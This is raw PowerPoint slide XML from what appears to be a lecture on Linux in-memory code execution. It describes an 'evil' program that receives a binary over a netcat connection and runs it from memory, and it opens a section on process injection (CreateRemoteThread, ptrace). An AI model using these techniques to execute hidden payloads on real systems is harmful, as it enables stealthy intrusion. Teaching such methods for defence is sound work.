            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> that will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>be sent by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a client program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>and be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>downloaded by the program (called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> in the case) in the previous slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l $((0x1111))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>program shown in the previous slide.</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="5373220"/>
            <a:ext cx="7200800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use this pseudo terminal on the server host to simulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a client program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="左大括弧 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="2863163" y="3520369"/>
            <a:ext cx="288034" cy="3417665"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48975"/>
              <a:gd name="adj2" fmla="val 50823"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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1" name="手繪多邊形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="3492499"/>
            <a:ext cx="3543300" cy="1304653"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 330200 w 3543300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1054100"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 3543300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1054100"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 3543300"/>
              <a:gd name="connsiteY2" fmla="*/ 787400 h 1054100"/>
              <a:gd name="connsiteX3" fmla="*/ 3543300 w 3543300"/>
              <a:gd name="connsiteY3" fmla="*/ 787400 h 1054100"/>
              <a:gd name="connsiteX4" fmla="*/ 3543300 w 3543300"/>
              <a:gd name="connsiteY4" fmla="*/ 1054100 h 1054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3300" h="1054100">
                <a:moveTo>
                  <a:pt x="330200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="787400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543300" y="787400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543300" y="1054100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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78373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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://img.itw01.com/images/2018/02/20/23/4825_Da8L7O_IKJHEIJ.jpg!r800x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 y="2564904"/>
            <a:ext cx="8057445" cy="3823626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文字方塊 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="5373216"/>
            <a:ext cx="3332088" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1) execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server host.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="手繪多邊形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="4653136"/>
            <a:ext cx="1562100" cy="782464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1562100 w 1562100"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1041400"/>
              <a:gd name="connsiteX1" fmla="*/ 1562100 w 1562100"/>
              <a:gd name="connsiteY1" fmla="*/ 381000 h 1041400"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1562100"/>
              <a:gd name="connsiteY2" fmla="*/ 381000 h 1041400"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1562100"/>
              <a:gd name="connsiteY3" fmla="*/ 1041400 h 1041400"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1562100" h="1041400">
                <a:moveTo>
                  <a:pt x="1562100" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1562100" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1041400"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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4572000" y="4914900"/>
            <a:ext cx="3960440" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3) At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send the code of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the server port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x1111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is listening. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> obtains the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and stores the code in its memory, and then execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="手繪多邊形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177800" y="3263900"/>
            <a:ext cx="7353300" cy="3429000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 7353300 w 7353300"/>
              <a:gd name="connsiteY0" fmla="*/ 3086100 h 3429000"/>
              <a:gd name="connsiteX1" fmla="*/ 7353300 w 7353300"/>
              <a:gd name="connsiteY1" fmla="*/ 3429000 h 3429000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 7353300"/>
              <a:gd name="connsiteY2" fmla="*/ 3429000 h 3429000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 7353300"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 3429000"/>
              <a:gd name="connsiteX4" fmla="*/ 215900 w 7353300"/>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53300" h="3429000">
                <a:moveTo>
                  <a:pt x="7353300" y="3086100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7353300" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215900" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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手繪多邊形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="3314700"/>
            <a:ext cx="3898900" cy="1701800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1816100 w 3898900"/>
              <a:gd name="connsiteY0" fmla="*/ 1701800 h 1701800"/>
              <a:gd name="connsiteX1" fmla="*/ 1816100 w 3898900"/>
              <a:gd name="connsiteY1" fmla="*/ 1574800 h 1701800"/>
              <a:gd name="connsiteX2" fmla="*/ 3898900 w 3898900"/>
              <a:gd name="connsiteY2" fmla="*/ 1574800 h 1701800"/>
              <a:gd name="connsiteX3" fmla="*/ 3898900 w 3898900"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1701800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 3898900"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1701800"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 3898900"/>
              <a:gd name="connsiteY5" fmla="*/ 1028700 h 170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98900" h="1701800">
                <a:moveTo>
                  <a:pt x="1816100" y="1701800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1816100" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3898900" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3898900" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1028700"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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5488384" y="2882984"/>
            <a:ext cx="2467992" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3194344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876397" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>you’re familiar with Windows runtime code injection you probably know the great API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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> which lets us force an arbitrary running process to call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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and load a DLL into its address space, this technique called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DLL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is often used to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user space API hooking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>no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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> equivalent on Linux system, therefore we can only rely on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ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a: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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
